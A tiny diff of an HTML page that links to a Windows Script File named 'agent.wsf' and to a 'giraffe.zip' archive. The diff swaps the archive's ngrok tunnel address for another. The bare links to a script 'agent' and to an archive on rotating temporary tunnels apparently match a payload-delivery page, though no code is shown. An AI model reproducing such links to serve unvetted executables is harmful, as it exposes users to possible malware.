--- a/index.html
+++ b/index.html
@@ -1,5 +1,5 @@
 
 <a href="agent/agent.wsf">Agent</a>
 <br/>
-<a href="https://e129-2a00-1370-817a-a600-9ef-4e19-66fe-af9e.ngrok-free.app/agent/giraffe.zip">Giraffe</a>
+<a href="https://0421-109-252-43-239.ngrok-free.app/agent/giraffe.zip">Giraffe</a>
     
